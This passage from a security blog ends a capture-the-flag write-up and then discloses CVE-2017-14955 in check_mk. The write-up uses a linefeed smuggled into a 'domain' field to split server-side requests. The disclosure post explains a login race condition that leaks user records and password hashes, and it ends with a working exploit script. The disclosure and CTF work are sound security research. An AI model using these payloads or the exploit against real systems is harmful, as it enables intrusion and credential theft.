SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2
Protocol mismatch.

Et voila. Since scanning all ports manually and requesting everything using the read.php file was a bit inefficient, I wrote a small Python script which scans a range of given port numbers (e.g. from 81 to 1338), fetches the “next” response and finally tries to base64-decode its value:

import requests
import json
import base64

try:
	from requests.packages.urllib3.exceptions import InsecureRequestWarning
	requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
except:
	pass

proxies = {
  'http': 'http://127.0.0.1:8080',
  'https': 'http://127.0.0.1:8080',
}

cookies = {"admin":"yes"}
headers = {"User-Agent": "Mozilla/5.0", "Host":"admin.acme.org", "Content-Type":"application/json"}

def make_session(x):
	url = "http://104.236.20.43/index.php"
	payload = {"domain":"h1-212.rcesec.com:"+str(x)+";.com"}
	r = requests.post(url, headers=headers, verify=False, cookies=cookies, proxies=proxies, data=json.dumps(payload))
	data = json.loads(r.text)['next']

	url = "http://104.236.20.43" + data
	r = requests.get(url, headers=headers, verify=False, cookies=cookies, proxies=proxies)
	data = json.loads(r.text)['data']
	if data != "":
		print "33[92mFound open port:33[91m " + str(x) + "\n33[92mReading data: 33[0;0m" + base64.b64decode(data)

for x in range(81, 1338):
	make_session(x)

When run, my script finally discovered another open port: 1337 (damn, that was obvious ;-) ):

Bypassing the Domain Validation (Part 2)

So it seemed like the flag could be located somewhere on the service behind port 1337. However, I noticed an interesting behaviour I hadn’t thought about earlier: when a single slash was appended after the port number:

POST / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes
Content-Type: application/json
Content-Length: 41

{"domain":"h1-212.rcesec.com:1337/;.com"}

The web application always returned an HTTP 404:

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.10.3 (Ubuntu)</center>
</body>
</html>

This is simply due to the fact that the semicolon was interpreted by the web server as part of the path itself. So if “;.com” did not exist on the remote server, the web server always returned an HTTP 404. To overcome this hurdle, a bit of creative thinking was required. Assuming that the flag file would simply be named “flag”, the following conditions had to be met in the end:

  1. The domain had to end with “.com”
  2. The URL-splitting characters ?, & and # as well as their (double-) URL-encoded variants were not allowed

In the end the following request actually met all conditions:

POST / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes
Content-Type: application/json
Content-Length: 45

{"domain":"h1-212.rcesec.com:1337/flag\u000A.com"}

Here I was using a unicode-encoded linefeed character to split the domain name into two parts. This actually triggered two separate requests, which could be observed by how much the “id” parameter of the returned read.php reference increased. So when a single request without the linefeed character was issued:

POST / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes
Content-Type: application/json
Content-Length: 45

{"domain":"h1-212.rcesec.com:1337/flag;.com"}

the application returned the ID “0”:

HTTP/1.1 200 OK
Date: Wed, 15 Nov 2017 09:28:55 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 26
Connection: close
Content-Type: text/html; charset=UTF-8

{"next":"\/read.php?id=0"}

However when the linefeed payload was issued:

POST / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes
Content-Type: application/json
Content-Length: 50

{"domain":"h1-212.rcesec.com:1337/flag\u000A.com"}

The read.php “id” parameter was suddenly increased by two, to “2”:

HTTP/1.1 200 OK
Date: Wed, 15 Nov 2017 09:30:08 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 26
Connection: close
Content-Type: text/html; charset=UTF-8

{"next":"\/read.php?id=2"}

This indicated that the application actually accepted both “domains”, leading to two different requests being sent. Querying the ID value minus 1 therefore returned the result of the call to “h1-212.rcesec.com:1337/flag”:

GET /read.php?id=1 HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes

Et voila:

HTTP/1.1 200 OK
Date: Wed, 15 Nov 2017 09:32:56 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 191
Connection: close
Content-Type: text/html; charset=UTF-8

{"data":"RkxBRzogQ0YsMmRzVlwvXWZSQVlRLlRERXBgdyJNKCVtVTtwOSs5RkR7WjQ4WCpKdHR7JXZTKCRnN1xTKTpmJT1QW1lAbmthPTx0cWhuRjxhcT1LNTpCQ0BTYip7WyV6IitAeVBiL25mRm5hPGUkaHZ7cDhyMlt2TU1GNTJ5OnovRGg7ezYK"}

When the “data” value was base64-decoded, it finally revealed the flag:

FLAG: CF,2dsV\/]fRAYQ.TDEp`w"M(%mU;p9+9FD{Z48X*Jtt{%vS($g7\S):f%=P[Y@nka=<tqhnF<aq=K5:BC@Sb*{[%z"+@yPb/nfFna<e$hv{p8r2[vMMF52y:z/Dh;{6
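
For reference, the final two-step retrieval can also be scripted. Here is a minimal sketch of mine (assuming the dnschef setup from above, so that “h1-212.rcesec.com” still resolves to 127.0.0.1):

import requests
import json
import base64

headers = {"Host": "admin.acme.org", "Content-Type": "application/json"}
cookies = {"admin": "yes"}

# step 1: the \u000A linefeed splits the value into two "domains", so the
# backend issues one request to :1337/flag and a second one to ".com"
payload = '{"domain":"h1-212.rcesec.com:1337/flag\\u000A.com"}'
r = requests.post("http://104.236.20.43/", headers=headers, cookies=cookies, data=payload)
next_id = int(json.loads(r.text)['next'].split("id=")[1])

# step 2: the response of the ":1337/flag" request is stored under the previous id
r = requests.get("http://104.236.20.43/read.php?id=" + str(next_id - 1), headers=headers, cookies=cookies)
print base64.b64decode(json.loads(r.text)['data'])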

Challenge completed.

CVE-2017-14955: Win a Race Against Check_mk to Dump All Your Login Data

18 October 2017 at 00:00

The authors of check_mk have fixed a quite interesting vulnerability called CVE-2017-14955 (sorry, no fancy name here), which I recently reported to them and which affects the oldstable version 1.2.8p25 and below of both check_mk and check_mk Enterprise. It’s basically a race condition in the login functionality, which in the end leads to the disclosure of authentication credentials to an unauthenticated user. Sounds like a bit of fun, doesn’t it? Let’s dig into it ;-)

How to win a race

You might have seen this login interface before:

While trying to brute force the authentication of check_mk with multiple concurrent threads using the following request:

POST /check_mk/login.py HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---9519178121294961341040589727
Content-Length: 772
Connection: close
Upgrade-Insecure-Requests: 1

---9519178121294961341040589727
Content-Disposition: form-data; name="filled_in"

login
---9519178121294961341040589727
Content-Disposition: form-data; name="_login"

1
---9519178121294961341040589727
Content-Disposition: form-data; name="_origtarget"

index.py
---9519178121294961341040589727
Content-Disposition: form-data; name="_username"

omdadmin
---9519178121294961341040589727
Content-Disposition: form-data; name="_password"

welcome
---9519178121294961341040589727
Content-Disposition: form-data; name="_login"

Login
---9519178121294961341040589727--

A really interesting “No such file or directory” exception is thrown randomly and not reliably reproducibly; it looks like the following:

<td class="left">Exception</td><td><pre>OSError ([Errno 2] No such file or directory)</pre></td></tr><tr class="data even0"><td class="left">Traceback</td><td><pre>  File &quot;/check_mk/web/htdocs/index.py&quot;, line 95, in handler
    login.page_login(plain_error())

  File &quot;/check_mk/web/htdocs/login.py&quot;, line 261, in page_login
    result = do_login()

  File &quot;/check_mk/web/htdocs/login.py&quot;, line 254, in do_login
    userdb.on_failed_login(username)

  File &quot;/check_mk/web/htdocs/userdb.py&quot;, line 273, in on_failed_login
    save_users(users)

  File &quot;/check_mk/web/htdocs/userdb.py&quot;, line 582, in save_users
    os.rename(filename, filename[:-4])
</pre></td></tr><tr class="data odd0"><td class="left">Local Variables</td><td><pre>{'contacts': {u'admin': {'alias': u'Administrator',
                              'contactgroups': ['all'],
                              'disable_notifications': False,
                              'email': u'[email protected]',
                              'enforce_pw_change': False,
                              'last_pw_change': 0,
                              'last_seen': 0.0,
                              'locked': False,
                              'num_failed': 0,
                              'pager': '',
                              'password': '$1$400000$13371337asdfasdf',
                              'roles': ['admin'],
                              'serial': 2},
[...]

I guess you find this as interesting as I did, because this Python exception basically contains a copy of all added users including their email addresses, roles, and even their hashed passwords.

Triaging

Sometimes I’m really curious about the root cause of a vulnerability, just like in this specific case. What makes this one so interesting is the fact that it can be triggered by just knowing one valid username, which is usually “omdadmin”.

So as soon as a login fails, the function “on_failed_login()” from /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py is triggered (lines 261-273):

def on_failed_login(username):
    users = load_users(lock = True)
    if username in users:
        if "num_failed" in users[username]:
            users[username]["num_failed"] += 1
        else:
            users[username]["num_failed"] = 1

        if config.lock_on_logon_failures:
            if users[username]["num_failed"] >= config.lock_on_logon_failures:
                users[username]["locked"] = True

        save_users(users)

This function basically stores the number of failed login attempts for a valid user and in the end calls another function named “save_users()” with the updated users dictionary as an argument. When tracing further through save_users(), you’ll finally come across the vulnerable code part (lines 575-582):

    
    # Users with passwords for Multisite
    filename = multisite_dir + "users.mk.new"
    make_nagios_directory(multisite_dir)
    out = create_user_file(filename, "w")
    out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
    out.write("multisite_users = \\\n%s\n" % pprint.pformat(users))
    out.close()
    os.rename(filename, filename[:-4])

But the vulnerability doesn’t look quite obvious, right? Well, it’s basically about a race condition - if you’re not familiar with race conditions, just imagine the following situation applied to that code snippet (a minimal stand-alone reproduction follows the list):

  1. When brute-forcing, you usually use multiple, concurrent threads, because otherwise it would take too long.
  2. All of these threads will go through the same instruction set, which means they will call the save_users() function at nearly the same time - depending a bit on the connection delay between the client and the server.
  3. For simplicity, let’s imagine two of these threads are only a tenth of a millisecond away from each other, so “delayed” by just one instruction (in terms of the script shown above).
  4. The first thread passes all instructions and thereby creates a new “users.mk.new” file (line 2), until it reaches the os.rename call (line 8), but has not yet executed it.
  5. The second thread does the very same, but with the mentioned small delay: it passes all instructions up to line 7, which means it has just closed the “users.mk.new” file and is now about to call the os.rename function as well.
  6. Since the first thread is a bit ahead of time, it is the first to process the os.rename function call and thereby renames the “users.mk.new” file to “users.mk”.
  7. The second thread now tries to do the very same thing. However, the “users.mk.new” file was just renamed by the first thread, so its own os.rename call tries to rename a file that no longer exists.
  8. Since there is no exception handling built around this instruction set, the Python script fails because the second thread cannot find the file to rename and finally throws the stack trace from above, leaking all the credential details.
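
To make the race a bit more tangible, here is a minimal stand-alone sketch (my own illustration, not the actual check_mk code) that mimics the write-then-rename pattern of save_users() with two threads; sooner or later one thread loses the race and its os.rename throws exactly this kind of OSError:

import os
import threading

def writer():
    # mimics save_users(): write a temporary file, then rename it into place
    for _ in range(1000):
        try:
            with open("users.mk.new", "w") as f:
                f.write("dummy content\n")
            os.rename("users.mk.new", "users.mk")
        except OSError as e:
            # the losing thread ends up here: "users.mk.new" was already
            # renamed away by the other thread
            print("lost the race, rename failed: %s" % e)

threads = [threading.Thread(target=writer) for _ in range(2)]
for t in threads:
    t.start()
for t in threads:
    t.join()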

A few more things that come into play here:

First: the create_user_file() function doesn’t really play an important role here, since its sole purpose is to create a new file object. So if the file passed to it via its “path” argument already exists in the file system, it will not throw an exception at all.

def create_user_file(path, mode):
    path = make_utf8(path)
    f = file(path, mode, 0)
    gid = grp.getgrnam(defaults.www_group).gr_gid
    # Tackle user problem: If the file is owned by nagios, the web
    # user can write it but cannot chown the group. In that case we
    # assume that the group is correct and ignore the error
    try:
        os.chown(path, -1, gid)
        os.chmod(path, 0660)
    except:
        pass
    return f

Second: More interestingly, the application ships with its own crash reporting system (see packages/check_mk/check_mk-1.2.8p25/web/htdocs/crash_reporting.py), which prints out all local variables, including these very sensitive ones:

def show_crash_report(info):
    html.write("<h2>%s</h2>" % _("Crash Report"))
    html.write("<table class=\"data\">")
    html.write("<tr class=\"data even0\"><td class=\"left legend\">%s</td>" % _("Crash Type"))
    html.write("<td>%s</td></tr>" % html.attrencode(info["crash_type"]))
    html.write("<tr class=\"data odd0\"><td class=\"left\">%s</td>" % _("Time"))
    html.write("<td>%s</td></tr>" % time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(info["time"])))
    html.write("<tr class=\"data even0\"><td class=\"left\">%s</td>" % _("Operating System"))
    html.write("<td>%s</td></tr>" % html.attrencode(info["os"]))
    html.write("<tr class=\"data odd0\"><td class=\"left\">%s</td>" % _("Check_MK Version"))
    html.write("<td>%s</td></tr>" % html.attrencode(info["version"]))
    html.write("<tr class=\"data even0\"><td class=\"left\">%s</td>" % _("Python Version"))
    html.write("<td>%s</td></tr>" % html.attrencode(info.get("python_version", _("Unknown"))))
    html.write("<tr class=\"data odd0\"><td class=\"left\">%s</td>" % _("Exception"))
    html.write("<td><pre>%s (%s)</pre></td></tr>" % (html.attrencode(info["exc_type"]),
                                                     html.attrencode(info["exc_value"])))
    html.write("<tr class=\"data even0\"><td class=\"left\">%s</td>" % _("Traceback"))
    html.write("<td><pre>%s</pre></td></tr>" % html.attrencode(format_traceback(info["exc_traceback"])))
    html.write("<tr class=\"data odd0\"><td class=\"left\">%s</td>" % _("Local Variables"))
    html.write("<td><pre>%s</pre></td></tr>" % html.attrencode(format_local_vars(info["local_vars"])))
    html.write("</table>")

Third: There is also another vulnerable instruction set right before the first one at /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py - lines 567 to 573, with exactly the same issue:

    
    # Check_MK's monitoring contacts
    filename = root_dir + "contacts.mk.new"
    out = create_user_file(filename, "w")
    out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
    out.write("contacts.update(\n%s\n)\n" % pprint.pformat(contacts))
    out.close()
    os.rename(filename, filename[:-4])

About the Vendor Response

Just one word: amazing! I reported this vulnerability on Thursday, 2017-09-21, and they had already pushed a fix to their git on Monday, 2017-09-25, publishing the new version 1.2.8p26 with the official fix at the same time. Really commendable work, check_mk team!

Exploit time!

An exploit script will be disclosed soon over at Exploit-DB; in the meantime, take it from here:

#!/usr/bin/python
# Exploit Title: Check_mk <= v1.2.8p25 save_users() Race Condition
# Version:       <= 1.2.8p25
# Date:          2017-10-18
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:      https://www.rcesecurity.com
# Software Link: https://mathias-kettner.de/check_mk.html
# Tested on:     1.2.8p25
# CVE:		 CVE-2017-14955
#
# Howto / Notes:
# This scripts exploits the Race Condition in check_mk version 1.2.8p25 and
# below as described by CVE-2017-14955. You only need a valid username to
# dump all encrypted passwords and make sure to setup a local proxy to
# catch the dump. Happy brute forcing ;-)

import requests
import threading

try:
	from requests.packages.urllib3.exceptions import InsecureRequestWarning
	requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
except:
	pass

# Config Me
target_url = "https://localhost/check_mk/login.py"
target_username = "omdadmin"

proxies = {
  'http': 'http://127.0.0.1:8080',
  'https': 'http://127.0.0.1:8080',
}

def make_session():
	v = requests.post(target_url, verify=False, proxies=proxies, files=[('filled_in', (None, 'login')), ('_login', (None, '1')), ('_origtarget', (None, 'index.py')), ('_username', (None, target_username)), ('_password', (None, 'random')), ('_login', (None, 'Login'))])
	return v.content

NUM = 50

threads = []
for i in range(NUM):
    t = threading.Thread(target=make_session)
    threads.append(t)
    t.start()